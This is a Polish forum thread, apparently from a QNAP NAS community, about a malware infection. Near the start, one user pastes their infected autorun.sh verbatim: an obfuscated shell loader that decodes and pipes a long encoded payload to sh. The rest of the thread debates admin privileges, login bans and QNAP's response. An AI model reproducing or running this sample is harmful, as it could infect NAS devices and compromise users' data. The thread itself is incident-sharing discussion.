- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Zaktualizowałem swoje urządzenie - nic nie wybuchło. MR nadal w wersji 3.2 ;(
A tak wygląda mój autorun.sh po infekcji:
A tak wygląda mój autorun.sh po infekcji:
Kod:
#!/bin/sh
ev${rtXbYqoYFVbQhlo}al${oxNhqzRHYsXtpQ}
${ShhIkhiMRtLD}false
uns${HwLiZuiiGPcvmDi}et
built${wOzfzecpaCVcwrH}i${AnrnA}n
e${ZfEh}va${TjYP}l${IRbyQCSQVgvQof}
comma${ikVoiP}nd${OZsL}
mzeHbT=t$'\x72'${yjGmVzPeJR}
BsOSlhv=$aogttwqJNCZlQ$''${OIzgkQGnfUSk}\\$NRjVkZXPRhJPl$''${ImYlYSXhEPji}
RSmecKrq=${mAFjFFPuiCOf}${ehUaCWKsuRHIZtO}${hdPYzvyORIZZME}${BsOSlhv}13${xfdNHwpXYFvHzFj}${MuKwqIzhHTvqnt}${MivziauLSOpeL}3
taYAcXm=${jzfjhzBrIpnH}${cjsDuYtNYRWXtDs}${hsyaSjASmujpif}${BsOSlhv}05${UKZTyNxqKxRwXmo}${uvnpCTVIVkNueA}${sRByTpCduYeAg}5
YofuJSY=${ncEWciAzmlJe}${WUmZSbbkMfdGkrK}${UfdxpLRRxXRoby}${BsOSlhv}13${ffaAkrruFqKLGef}${uboJfQNfFLAydG}${WcXQfaLxuozNI}4
$mzeHbT '=;TnBODsJWVG]{E\n"qpN}Mi(Hb$#yZKvx<m *QuPft%'$taYAcXm'rFULYedjwS|C`g!hI)az'$YofuJSY'R'$RSmecKrq'l+k&Xo'"'"'>cA' 'q(YV!l)jv<=Mw\nD'$YofuJSY'{#Pfs|d+xnam gTShoy>rAX&;tIQzWLGFiJ%EH'$RSmecKrq'bp'"'"'NZ$BKCe"Ou]*'$taYAcXm'`UcRk}' << "eYCuZmTVGsybdO" | s${MZVdvNdtDaIvxQH}${WmDZcaqRzSrAwX}${CoyOIGrawWPZw}h
qB/Ceb/}x{{lI"]<EpHAbI"\T]C)il%'AI"Zmr%oA}\t{\J$OI"Qwzs]KGYA{Ig
H74g\}tI"tdbSY-c)=ueaSrJA{CleOI"SG!KAtI"%nZzlL>%LL\Aeb{I"uEGUu->e\'T>*eAtmI"=#[r<wJLYbA`\I"t#Go%Tn!A{lbI"NpFmEG>J*}sL]c#A}I"d=S[A\I"N-lTm)$[x!Go*HAt{I"u\t!N>Jd$ZSnlxoAN$O}ILZZZKOdLdK$G-ZwIRR\{lb}I"xl}uZtZSQ]vc>A\I"wvbLN%SQtAI"CnhYlAt{t*lI"E$HT}nnS`\[thCiA\{CI"#>'NQ*s]nAleI"T]]`zet=UJZ[NAOteI"dZ-F)t*]KUueuAb{I"o>aJCpOrtAt*l\{tI"txGb=o[A*lI"`p#J)A\I"zJwb-h[T]A{t*lI"#hNp}*as#A\{t*I"wUQpAlI"CaT*UasmA\{t\}tI"S!<LJA{\I"tvsuNJsxw}\>AJ$OI"vvSeYs$hax`#`!AI"GL'-H=}A{CleOtI"tl)>hYAeb{'<##I"}siCUZ\='!sAI>Ke}\IRR$bi{'<#I"%)Y[]oh#OKzZmdA#$bi{N$Ig
H6'g}I"TcS=ZAI"ll`simY<A\{t\Ig
H73gtI"LEn%xs%AI"*ZxCF>A{NI"hr}xsmCaE}A$OI"<t#L}}A}I"\EseilGzQH-A\{tmIHtbUel[Igg`\I"NemZAI"x'[ZTuLUSA{<Ni#SC%nVtIg
H72gI"l>GHZu'eAI"tNzSlQS$zG'AI"ZNmn$di#[CiKcHA{sioK`v'tVI"w}SJ=tAg
gI"%w[-'YA{GdtJ>>VI"*e)$nAI"tNHC=TAI"sioK`v'tAI"]LQbCOA13I"OJQ-StZ-tSs%Q!A3{se=wdZGaVI"\tS`HAI"<JsEz'AI"sioK`v'tAI"Q)rHxvA05I"Eo*alZ[i=e)}'eA5{U!sKuHbVI"uvr#CAI"JFSG\zAI"sioK`v'tAI"pH=OS)A13I"a'tH\QxtKem]'NA4{I<Ni#SC%nygO
b;"shaK#M`yC=[P)Ntj'gRgRg>cn}dgIse=wdZGagqx$!Hf<+JlR-AUbGS*Ip%gIGdtJ>>gWkz(TXmuZLFovDQwi EgIU!sKuHbgeVBr\Y]gyg W"QwlR\AMzI)=ma>gIse=wdZGag<n'ZuJikq*!#E-NGFOf%][PsgIU!sKuHbg`+YegIGdtJ>>g(HKBT$jrDtcSVo
bCgRgRghd;XLUxvy}pbgWWRnptlJNQNa=eRMC$I"umLrb<A}xI"$#%GCuJ$%x]JuzA{dk/DI]/\VvK|Gt&urY"WLFay;Y"WL#:/DI]:/\DI]:/h\&/DI]:/h\&/\DI]:/h\&/DI]/>11:/h\&/+t'(+/\DI]:/h\&/+t'(+/DI]av'txx(]nrNcrnI&](xKrO/nKc/]h++r2OA1rMMrnI&](xKr mr;ruK\urNXray1arAArK'Vtra.arAAr&Kuh&]Jr+t'(+r&Fay;1Tay;1dd}pk/S#a#aJr'(\Kry&rI]r/}pk/S}/}Mpk/S}/}mr&Fay;&T/}#aJrK'Vtray;&Tay;&dd}pk/S#a#aJJr}/}mrK'Vtry;&TTpk/S#JJraamrK'Vtry1JJr}mrK'Vtr.JJrK\('Jr#vuK\urNnr/Ku'/'t]HIgrAAr't]HnI&F/Ku'/'t]HIgrMMr;ruK\urNnr/x]u/L$"_)--W/.'t]HIgrAAr't]HnI&F/x]u/L$"_)--W/.'t]HIgJr#v'txx(]nrNcrgKu'HgrOr/nKc/]h++r2OA1rMMrgKu'Hgr mr;r\KnrN]rQLJy;|J\/b .}bvbpQay;1//b//bbb/#aQSbM^bpQay;1//b//bbb/#aQSbmbv//lJ\/b ^bMbvbmbpp^bvSb%bSbv.}//G#Qray;4:Ny;'t]HnI&#/heI]h|.'t]H#arMr\KnrN]rQ\/^Qay;2//b//bbb/#aQrb?Frb?b .}bm/b1/lGQJr#vDnI&FvuK\urNHray;'t]HnI&#/\xD.'t]HarAArHt&rIrI]rVtxK\rYhD+I'r$tR]+t(nrfh+uIxKnI(r<KDr)K't&nI]g\JrntrDnI&FEgKu'HgrayIarG(uVrNHray;'t]HnI&#/\xD.'t]HaErAAruK\urkrNXrayDnI&arAArDnI&FEnI&](xKrayDnI&aErAAruK\urNnrayDnI&arAAruK\uR&IuK(D+KFy xZuKxGray;DnI&#/.uxG.>>>>>>amrAAr&xray;uK\uR&IuK(D+K#arAArD&K(ZJrDnI&FQQJrnt]KvuK\urNXray;DnI&#arMMruK\urkrNnray;DnI&#arAAr;r'txx(]nrNcr&K(n+I]ZrO/nKc/]h++r2OA1rMMr+]rN\Hr/DI]/Dh\[Dt|r/h\&/DI]/&K(n+I]ZJrHt&rIrI]rVtxK\rYhD+I'r$tR]+t(nrfh+uIxKnI(r<KDr)K't&nI]g\JrntrDnI&FE&K(n+I]Zra/\V(&K/y;I#ar2O/nKc/]h++ErAAruK\urkrNXrayDnI&arAArDnI&FEnI&](xKrayDnI&aErAArDnI&F/\V(&K/y;DnI&dd}/#rAAruK\urNnrayDnI&arAArD&K(ZJrnt]KJvuK\urNXray;DnI&#arMMruK\urkrNnray;DnI&#aJr#rAAr;rDnI&FEgKu'HgrBL")s_$s*rnKHjt+fYrNHray;'t]HnI&#/nKH_\V(&K.I]HtaEvuK\urNXray;DnI&#arMMruK\urkrNnray;DnI&#aJr#rAAr;rDnI&FExth]urMr\KnrN]ra\/.}b b/\V(&Kb/p^r/Sb%bmr.}/b1/gGarMrVK(nrN]r1EvuK\urNXray;DnI&#arMMruK\urkrNnray;DnI&#aJr#rAAr;rHt&rIrI]r`"`Ls$sj3_$"W"r`"`Ls$sj2_$"W"r`"`Ls$sj1_$"W"rf$0_$"W"JrntruK\urNnra/\V(&K/y;I#arAArDnI&Fa/\V(&K/y;I#arAArD&K(ZJrnt]KJvuK\urNXray;DnI&#arMMruK\urkrNnray;DnI&#arAArDnI&F/x]u/L$"_)--WJr#v(&'V_tFEh](xKrNxrMrg&KGrNIra|86bMIp3N6S86arOr/nKc/]h++rAArK'Vtr|86rMMrK'Vtr(&xEvhG]GDI]Fy K'VtrcEK'VtrN]Krabb|61bb|75aEn)<EK'VtrN]Krabb|79bb|65bb|65bb|73aErMru&raBwsHjif)"))]jxKBx
Cx"sg`W<arawzzVcWR\$Pe
jnX''(lf)
e!*!amv'gIFy K'VtrhEK'VtrN]Krabb|76bb|6KaEVKEK'VtrN]Krabb|71bb|64bb|75aEKuEK'VtrN]Krabb|6Kbb|75bb|73aErMru&ra<u(L=$HDP<=C!<>xcwiKtaragWZgLzGq..PYsxszC!)u)amv\\VDI]Fy K'Vtr*YEK'VtrN]Krabb|63bb|72bb|78aE=VEK'VtrN]Krabb|6Kbb|67bb|69aErMru&ra!xgV"$Wt\""q&`f+)g|xB'>W[(araZcGLux$C
DoiXlxihz'Pgf\Y'=amv\\VVZK[Fy K'VtrqEK'VtrN]Krabb|78bb|73aE('EK'VtrN]Krabb|78bb|65bb|65aE$EK'VtrN]Krabb|6Dbb|68aErMru&raw$Yz&tx|B
]\]s=W!!Pl$=Y`XXara<cZ=RnBKg$Rn.i
lxiiIsRnuB'amv\\V(huVFy K'VtrlfUEK'VtrN]Krabb|6(bb|76bb|6nbb|6DaEY)EK'VtrN]Krabb|67bb|72bb|65aErMru&raqw*"PUU*n+LhfZBwRYV$&zearal-'uijLBV+sW(\x$Kiw>oW\amv\\V't]HFy K'Vtr*sEK'VtrN]Krabb|71bb|79bb|75aEBEK'VtrN]Krabb|61bb|73aErMru&ras
c*H)U)qY!VWo+)i<LUara+Lg"cDB<XgnZ!z>>-fG`amv(&'V(&xFy K'VtrgEK'VtrN]Krabb|79bb|62aEHEK'VtrN]Krabb|65bb|6(aErMru&rahCLe+x&<|gn]ngCWqw'&+q-araYBflDI=c-(X|Pzz'!+>
.(Pamv(&'V|86Fy K'Vtro]LEK'VtrN]Krabb|74bb|75bb|75bb|6HaEh(EK'VtrN]Krabb|75bb|6Hbb|6KaE=LEK'VtrN]Krabb|6Hbb|6(bb|62aErMru&rac-u+!w>iC[gineuelhxshjDsRara
!fnGRR&Y]C\&X]<s<xh-f<ZLamvIG(uVFy K'Vtr\<EK'VtrN]Krabb|61bb|78bb|63aE])EK'VtrN]Krabb|73bb|67bb|6KaErMru&raXR&!B]x"uBw$"H+U+eg\&)araq`(eBgLq'xUYH&+XeC="i]amv'&t]\Fy K'Vtr=EK'VtrN]Krabb|64bb|7(aEDwEK'VtrN]Krabb|65bb|6Dbb|65aE>EK'VtrN]Krabb|6Dbb|7(aErMru&raDKhKfo)<IjoP"jloCBg>u`
]$ara(fK&gBt=GRU=c.BfloGhV*|WUamv(&'VFEh](xKrNxrMrg&KGrNIra|86bMIp3N6S86arOr/nKc/]h++rAArK'Vtray(&'V|86arMMrK'Vtray(&'V(&xaEvuK\urNHra./y;(&'V#arAAr\nI&FEGRnErMMr;ruK\uray;C"BL_B-o)`sp0S#arAAr\nI&Fy r'nray rnI&](xKray;C"BL_B-o)`sp0S#armarAArGRnrmrMMr;ruK\uray;0#arAAr\nI&Fy r'nray rnI&](xKray;0#armarAArGRnrmJr#rAAruK\urNHray;\nI&#/y;(&'V#arAAr'nray;\nI&#aJr#rMMr;ruK\urNHra/uxG/'t]HIg/y;(&'V#arAAr'nr/uxG/'t]HIgJr#rMMr;vxnI&Fy xZuKxGrNnr/uxG/.xth]u.>>>>>>mrMMr;rxnI&F/uxG/.xth]u.UDD|!tDJrxZnI&ry;xnI&#Jr#v__C--W_$sjFv__xtnK+FEgKu'HgrB[\uKxral]uK&](+rftnK+aEv`-q*l
_$sj_q-$sFEgKu'Hgra`-q*l
rBW-)"
sar$sjl`s_q-$srNHr/Ku'/G+(uHt&x.'t]HEv`-q*l
_$sj_Y")WFEgKu'Hgra`-q*l
rBW-)"
sar*B_"`Wljs_Y")WlWl-qrNHr/Ku'/G+(uHt&x.'t]HEv`-q*l
_$sj_*BFEgKu'Hgra`-q*l
rBW-)"
sar*B_WzYsrNHr/Ku'/G+(uHt&x.'t]HEv__C--W_`-q*FEuK\urNHr/Ku'/nKH(h+u_'t]HIg/C--W.'t]HrAAr'(ur/Ku'/nKH(h+u_'t]HIg/C--W.'t]Hr2O/nKc/]h++rMMr'(uray;'t]HnI&#/C--W.'t]HaErMMr;ruK\uray(&'V_tarFr(&xrAAr__C--W_`-q*FWBNq"B")fJr#rv'txx(]nrNcrV(+_(GGrOr/nKc/]h++r2OA1rAAr;r__C--W_$sjFy V(+_(GGrNNgKu_Dttu_GnrGt&u_InF0mJr#vuK\uray;__C--W_`-q*#arFrWBNq"B")frMMruK\uray(&'V_tarFr(&xrAAr;ruK\urNHr/Ku'/lB_W"BrAAr__C--W_$sjFay;__C--W_$sj:N/nKc/xunD+t'Z#7arMMr__C--W_$sjFay;__C--W_$sj:N/nKc/xunD+t'Z#5aJr#rMMr__C--W_$sjFay;__C--W_$sj:N/nKc/\n|#6avuK\ura|y;`-q*l
_$sj_q-$s#arkFra|arAAr;rhDI(uu('VrNxray;`-q*l
_$sj_Y")W#arNnr2Jrxth]urNurhDIH\rhDI2:'t]HIgray;xnI&#arOr/nKc/]h++r2OA1rMMr;ruK\urNHr/Ku'/lB_W"BrAArxth]urNurK|u4r/nKc/xx'D+Z0G7ray;xnI&#aJr#r#rMMrxth]ury;__C--W_$sj#rNurK|u2ry;xnI&#rMMr;ruK\uray;__xtnK+#arFraWBN201arAArxth]urNurK|u2r/nKc/xunD+t'Z4ry;xnI&#Jr#rMMr;rhDI(uu('VrNxray;`-q*l
_$sj_Y")W#arNnr2Jrxth]urNurhDIH\rhDI2:'t]HIgray;xnI&#aJrxth]urNurK|u4r/nKc/xx'D+Z0G7ray;xnI&#aJr#rMMr;ruK\uray;__xtnK+#arFraWBN269earAArxth]urNurK|u2r/nKc/\n'6ry;xnI&#Jr#rMMr;ruK\uray;__xtnK+#arFraWBN869arAArxth]urNurK|u2r/nKc/\nI6ry;xnI&#Jr#rMMr;ruK\uray(&'V_tarFr(&xrMMry;__C--W_`-q*#rFraWBNq"B")farAAr;rHt&rIrI]r5r7r4r6r3r8Jrntrxth]urNurK|u2ra/nKc/xunD+t'Zy;I#ary;xnI&#rAArD&K(ZJrnt]KJr#Jr#rMMr;ruK\uray(&'V_tarFr|86rAArHt&r]rI]r/nKc/\n'r/nKc/\n|r/nKc/\nIry__C--W_$sjJrntrHt&rIrI]r6ry`-q*l
_$sj_Y")WJrntrxth]urNurK|u2ry;]#y;I#ry;xnI&#rAArD&K(Zr2Jrnt]KJrnt]KJr#rMMr;rxth]urNurK|u2ry /\DI]/V(+_(GGrNNgKu_Dttu_GnrGt&u_InF0m6ry;xnI&#Jr#Jr#vHt&rHI+KrI]ray;\\VDI]#aray;hG]GDI]#ara.aJrntruK\urNHray;DnI&#/.y;IG(uV#/y;HI+K#arMMrD&K(ZJrnt]KvuK\urayHI+KarkFra.arMMruK\urkrNHray;DnI&#/.y;IG(uV#/y;'&t]\#.\VarAAr;ruK\urN\r.C--W_WlfsrAAr&K(nrN&rDttuuIxKr{r.C--W_WlfsrMMrK'VtrEn(uKr%T\ErOr.C--W_WlfsJruK\urN\ray;DnI&#/.C--W_WlfsarAAr&K(nrN&rDttuuIxKr{ray;DnI&#/.C--W_WlfsarMMrK'VtrEn(uKr%T\ErOray;DnI&#/.C--W_WlfsaJruK\urayDttuuIxKarMMr;r&K(nrN&rDttuuIxKr{r.C--W_WlfsJruK\urN\ray;DnI&#/.C--W_WlfsarAAr&K(nrN&rDttuuIxKr{ray;DnI&#/.C--W_WlfsaJr#JruK\urayDttuuIxKarAAr;r\+KKGr2JrpryDttuuIxKrNgur0rSrAArKFy rEn(uKr%T\ErNryDttuuIxKrmmrAArpryKrNgur0rSrAArpryKrN+ur1296000rSrAAr;ruK\urayxnI&arAAruK\urNKray;xnI&#arAAr;r'nr/Jr\VrN'ra\+KKGr5Jrhxth]ury;xnI&#Jr&xnI&ry;xnI&#arAr#Jr]tK|F1Jr#Jr#Jr#vuK\uray]tK|arFr1rMMr;v&xray;DnI&#/.C--W_Wlfsav&xr.C--W_WlfsvuK\urkrNHra./y;(&'V#arAAruK\urNnray;xnI&#arAAruK\urNHray;xnI&#/y;(&'V#arAAr'nray;xnI&#avunI&FExZuKxGrNnray;DnI&#/.uKxG.>>>>>>arMMrxZuKxGrNnra/\V(&K/YhD+I'/.uKxG.>>>>>>arMMrxZuKxGrNnra/x]u/L$"_)--W/.uKxG.>>>>>>aEvuK\urNnrayunI&arMMr;rHt&rIrI]rayDnI&ara/\V(&K/YhD+I'ara/x]u/L$"_)--WaJrntrxZnI&ray;I#/.uKxG.UDD|!tDarOr/nKc/]h++r2OA1rAAruK\urNnray;I#/.uKxG.UDD|!tDarAArunI&Fay;I#/.uKxG.UDD|!tDaJrnt]KJvuK\urNnrayunI&aJr#rMMr;runI&FExZuKxGrNnr/uxG/.uKxG.>>>>>>ErAAruK\urNnrayunI&aJr#rMMr;rxZnI&ra/uxG/.uKxG.UDD|!tDarAArunI&F/uxG/.uKxG.UDD|!tDrAAruK\urNnrayunI&aJr#rMMr;runI&FExZuKxGrNnr.>>>>>>ErAAruK\urNnrayunI&aJr#rMMr;rxZnI&ra.UDD|!tDarAArunI&Fa.UDD|!tDarAAruK\urNnrayunI&aJr#rMMrunI&FEGRnEv'Gray;(&'V#ary;unI&#v'nry;unI&#vu(&rN|XHray;(&'V#avg&KGrN*rQQr{{s-*rO/nKc/]h++r2OA1rAArHg&KGFag&KGrN*arMMr;r'txx(]nrNcrHg&KGrO/nKc/]h++r2OA1rAArHg&KGFHg&KGrMMrHg&KGFg&KGJr#vvs-*vuK\urayHg&KGarMMrHg&KGFg&KGvvuK\urNnray;DnI&#/.y;IG(uV#arMMrxZnI&rNGray;DnI&#/.y;IG(uV#arMMrxZnI&ray;DnI&#/.y;IG(uV#avvuK\urNHray'gIarAAr'Vxtnr755ray'gIarAAra./y;'gI#avvuK\urNHr/uxG/=GZg.'t]H.D(ZrAAr;ruth'VrN'&r/uxG/=GZg.'t]H.D(Zray;'t]HnI&#/=GZg.'t]HaJr&xr/uxG/=GZg.'t]H.D(ZJr#vv'GrNGry;'&t]\#ray;DnI&#/.y;IG(uV#/y;'&t]\#.\VarMMr;r'Gry;'&t]\#ray;DnI&#/.y;IG(uV#/y;'&t]\#.\VaJruth'VrN'&r/DI]/Dh\[Dt|ray;DnI&#/.y;IG(uV#/y;'&t]\#.\VaJr#vv'Vxtnr755ray;DnI&#/.y;IG(uV#/y;'&t]\#.\VavvIHrprNHray;'t]HnI&#/'&t]u(DarSJruVK]vuK\uray)"q$-farMMr)"q$-fF12499vuK\ury ry)"q$-frAr1rmmrFr0rAAr\G('KFQrQrMMr\G('KFQQv'&t]xI]\Fay ry)"q$-frTr4rmmavuK\urkray'&t]xI]\arNK=r0rAAr'&t]xI]\Fay;'&t]xI]\#0arvyHg&KGray;DnI&#/.y;IG(uV#/y;'&t]\#.\Varay;'t]HnI&#/'&t]u(DarO/nKc/]h++r2OA1rMMr;r+Fy r ER'rN+r{ray;'t]HnI&#/'&t]u(DaEr/r3mr%r1mmJruK\uray+arNgur0rAAr\KnrNIray;+#aQIQay'&t]xI]\aQr}r}r}r}rQay;DnI&#/.y;IG(uV#/y;'&t]\#.\VaQrOQay\G('KaQ/nKc/]h++r2OA1Qray;'t]HnI&#/'&t]u(DarMMrK'Vtray'&t]xI]\aQr}r}r}r}rQay;DnI&#/.y;IG(uV#/y;'&t]\#.\VaQrOQay\G('KaQ/nKc/]h++r2OA1aQrOOray;'t]HnI&#/'&t]u(DarAAr/Ku'/I]Iu.n/'&t]n.\Vr&K\u(&urOr/nKc/]h++r2OA1rAAruth'VrN'&ry;'t]HnI&#/(G('VKry;'t]HnI&#/'&t]u(DJr#vHIvvHt&rHI+KrI]ray;\\VDI]#aray;hG]GDI]#aJrntruK\urNHray;DnI&#/.y;IG(uV#/y;HI+K#arMMr'GrNGray;HI+K#aray;DnI&#/.y;IG(uV#/y;HI+K#arMMr;r'Gray;HI+K#aray;DnI&#/.y;IG(uV#/y;HI+K#aJruth'VrN'&r/DI]/Dh\[Dt|ray;DnI&#/.y;IG(uV#/y;HI+K#aJr#rnt]Kv'Vxtnr755ray;DnI&#/.y;IG(uV#/y;\\VDI]#av'Vxtnr755ray;DnI&#/.y;IG(uV#/y;hG]GDI]#avvg&KGrQ(nxI]:by1byby`ts)g7[]Uze\U2U4g+i34b.:Qr/Ku'/\V(ntRrO/nKc/]h++r2OA1rAAr;vkruK\urNnray;DnI&#/.+tgarAArxZnI&ray;DnI&#/.+tgavkruK\urNHr/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIrAAr;r'GrNGr/VtxK/VuuGn/'gINDI]/(huVetgI].'gIr/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIrMMr'Gr/VtxK/VuuGn/'gINDI]/(huVetgI].'gIr/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIJr#rAArK'VtrQdk/DI]/\VvY-BW$"W"FaavuK\ura|y;)s!osBW_fsWL-$#arFr|Y-BWrAAr;rv'(\Kray;`-qWsqW_esq
WL#arI]rQaQQaQrMr}pk0N9S}rMr0}rmrH(+\KrJJr}mruK\uray;`-qWsqW_esq
WL#arN+ur2147483646rJJrK\('rAAr;rl*BFr&K(nrNnrQaQQaQrN&]ray;`-qWsqW_esq
WL#arY-BW$"W"JruK\urNXrayY-BW$"W"arAArY-BW$"W"FEnnrD\F1r'th]uFay`-qWsqW_esq
WLar2O/nKc/]h++EJr#rMMruK\urayY-BW$"W"arMMrY-BW$"W"FE'(uErvvuK\urkrNXrayY-BW$"W"arAAr'(\Kray;Y-BW$"W"#arI]r}GRn}mruK\urNHraQy;DnI&#Q/.+tg/.'gI_+tgarMMr;ruK\urNnraQy;DnI&#Q/.+tgarMMrxZnI&rNGraQy;DnI&#Q/.+tgarAAruth'VraQy;DnI&#Q/.+tg/.'gI_+tgaJr#rAAruK\ury E\u(urN'rQaQaQT\QaQaQraQy;DnI&#Q/.+tg/.'gI_+tgaEmmrN+ur209715200rAAr'(urOOraQy;DnI&#Q/.+tg/.'gI_+tgar{{rs-*rJJrK\('Jvy)sf-Ws_"$$):yY-BW$"W"vs-*v#vuK\urkrNXrayY-BW$"W"arAAr'(\KrayY-BW$"W"arI]r}h\K&F(nxI]}rmru&hKrJJr}mrH(+\KrJJrK\('rMMr'(\Kray!os)z_BW)lq
arI]r}h\K&F(nxI]}mru&hKrJJr}mrH(+\KrJJrK\('rAAr;v'(\Kray;)sf-Ws_"$$)#arI]rQaQQaQrMr10.}rMr127.}rMr192.168.}rMr169.254.}rMr172.1p6N9S.}rMr172.2p0N9S.}rMr172.3p01S.}rMr}:}rmrH(+\KrJJr}mru&hKrJJrK\('rAArg&KGrQaQaQ(nxI]:by1byby`ts)g7[]Uze\U2U4g+i34b.:QaQaQr/Ku'/\V(ntRrO/nKc/]h++r2O/nKc/]h++rAArK|Iur0v#vIHrkruK\urNXrayY-BW$"W"aJruVK]rvK|K'rN(ray;0#ar/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIr{{rj4Pe$xzRc'vyY-BW$"W"vj4Pe$xzRc'vK+\KvK|K'rN(ray;0#ar/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIvHIvK|Iur0QrOr/VtxK/VuuGn/'gINDI]/_(huVetgI].'gIvuK\uray?arFr0rAAruK\urN\r/VtxK/VuuGn/'gINDI]/_(huVetgI].'gIrAAruK\urN\r/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIrAArxcr/VtxK/VuuGn/'gINDI]/_(huVetgI].'gIr/VtxK/VuuGn/'gINDI]/(huVetgI].'gIrAAr'Vxtnr755r/VtxK/VuuGn/'gINDI]/(huVetgI].'gIrAAruth'VrN'&r/VtxK/VuuGn/'gINDI]/!WB(huVetgI].'gIr/VtxK/VuuGn/'gINDI]/(huVetgI].'gIv#vv.ray;DnI&#/.y;IG(uV#/y;'&t]\#.\Vav'nray;\nI&#av&xrN&Hray;unI&#avuK\urayxnI&arAAruK\urNnrayxnI&arAAr;r'nr/Jr\VrN'ra\+KKGr5Jrhxth]ury;xnI&#Jr&xnI&ry;xnI&#arAr#rvu&hKJv#vvvd{nptlJNQNa=e{{q
eYCuZmTVGsybdO
Ponieważ nie ma ostatecznej wersji. Próbują ją przygotować od ponad 2 tygodni (może dłużej) co świadczy o tym jak dużo miesza ten malware. Chyba trzeba będzie pomyśleć o przygotowaniu bootowanlnego usb z niezmienionym fw i próbie podgrania go w nas.
Widzicie sami ...
Nie wiemy nic gdzie się to ustrojstwo zagnieżdża ... i zero komunikacji z qnap.
Nie wiemy nic gdzie się to ustrojstwo zagnieżdża ... i zero komunikacji z qnap.
Dla mnie to o niczym nie świadczy. Profesjonalne wytwarzanie oprogramowania nie polega na wydawaniu wersji na kolanie. Kod to jedno, ale są jeszcze szeroko rozumiane testy. W przypadku oprogramowania zwalczającego wirusy, robaki i tym podobne, trzeba brać pod uwagę wiele przypadków (= wiele sandboxów).
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Idąc ta logiką, można powiedzieć że PS i MS oraz inne aplikacje uruchamiane z prawami Administrator są napisane na kolanie.
Powinno być dziedziczenie uprawnień. No i przede wszystkim możliwość zmiany użytkownika Admin który każdy bot próbuje użyć do zalogowania. U konkurencji jest taka możliwość. Co powoduje utrudnione zadanie dla ciekawskich.
Powinno być dziedziczenie uprawnień. No i przede wszystkim możliwość zmiany użytkownika Admin który każdy bot próbuje użyć do zalogowania. U konkurencji jest taka możliwość. Co powoduje utrudnione zadanie dla ciekawskich.
Nie masz racji. Nawet jesli zmienisz nazwe uzytkownika na dupalala czy co tam chcesz to i tak uruchomiona usługa na tym koncie, jesli bedzie miala backdoora to pozwoli na wykonanie polecen z prawami uzytkownika "dupalala", ktory de facto jest ..adminem
Jednym z ciekawszym pomysłem bylo kiedys chrootowanie applikacji i uruchamianie ich na wlasnym srodowisku - i nie mowimy tu o emulacji czy wirtualcji. Zwyczajny chroot, czyli stworzenie dla aplikacji jakby podsystemu, w obrebie, ktorego ma ona dzialac. Skonczylo sie to tak, ze z chroota da sie łatwym trickiem wyjść w góre czyli w master system. I to dotyczylo Linuxa, ale z podobnym problemem spotkal sie VMware w swoim ESX. U nich sprawa była i NADAL jest katastrofalna, ze wirtualnego systemu na VMware ESX (czy to Windows, Linux, czy Mac), mozesz przedostać się do hosta. Reasumujac... nawet jesli jestes adminem, ale zmienisz nazwe usera absolutnie nic Ci to nie daje.
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Rozumiem. Ale zgodzisz się że mną że jeśli istniała by możliwość zmiany użytkownika Admin, ograniczyło by to możliwość szukania przez boty możliwość wejścia.
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
A i usługa uruchomiona np. Music Station uruchamiana by była na prawach User a nie admin. To nawet jak by się dało do niej wejść to miała by ograniczone możliwości. To wydawało mi się dziedziczeniem uprawnień. No ale nie jestem w tym specjalista.
To ją zablokuj używając reguły... 3 faile w logowaniu to ban.
Panie nie tak backdoory funkcjonują. Nie zgodzę się.
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Nie można ustawić 3 i ban. Bo Qnap uznał że musi być 5 prób.
Jesli bylaby uruchomiona na prawach uzytkownika innego niz admin (czyt. root) to tym samym musialbys temu uzytkownikowi dac prawa odczytu do danych w odpowiednich udzialach sieciowych tj. multimedia. To ma sens, ale... przed kazdym zainstalowaniem aplikacji user musialby o tym decydować. Nie poradzili by sobie użytkownicy komputerów Apple. I wiekszosc z Was.
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Hm. Byłem przekonany że to już programista doda regułę że MS musi mieć dostęp do muzyki która i tak wskazujemy w ustawieniach. A więc co więcej trzeba było by ustawiać, co już funkcjonuje. Wystarczyło by okno z komunikatem i wszystko.
Wydawało mi się że konkurencja właśnie tak działa.
No nic. Na pewno zawsze jest coś do poprawy.
Wydawało mi się że konkurencja właśnie tak działa.
No nic. Na pewno zawsze jest coś do poprawy.
Panowie, jak widzieliście moje urządzenie dalej ma syfa - który teoretycznie nie uaktywnia się już ale śmieci zostały ...
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
No chyba lepiej dać uprawnienia do zasobu z mediami a nie prawa admina? Rozumiem ze to wtrącenie o mac’ach i użytkownikach forum to po prostu przejaw szorstkiej męskiej przyjaźni
Wysłane z iPhone za pomocą Tapatalk
Wysłane z iPhone za pomocą Tapatalk
Oczywiscie ze tak. Taka powinna być idea. I to wymaga przepisania całego systemu QTS i konkurencyjnych też. Jest to naprawde kłopotliwe i mówie tu z doswiadczenia programisty.
Oj uwierz mi, że userzy Apple lubią być nieświadomie trollami na maksymalnym levelu. Bez urazy, ale spotkaliśmy się z naprawdę przekraczającymi granice przypadkami.Rozumiem ze to wtrącenie o mac’ach i użytkownikach forum to po prostu przejaw szorstkiej męskiej przyjaźni
- 6 Luty 2011
- 1 951
- 236
- 133
- 36
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Wydawało mi się że w S tak właśnie jest.
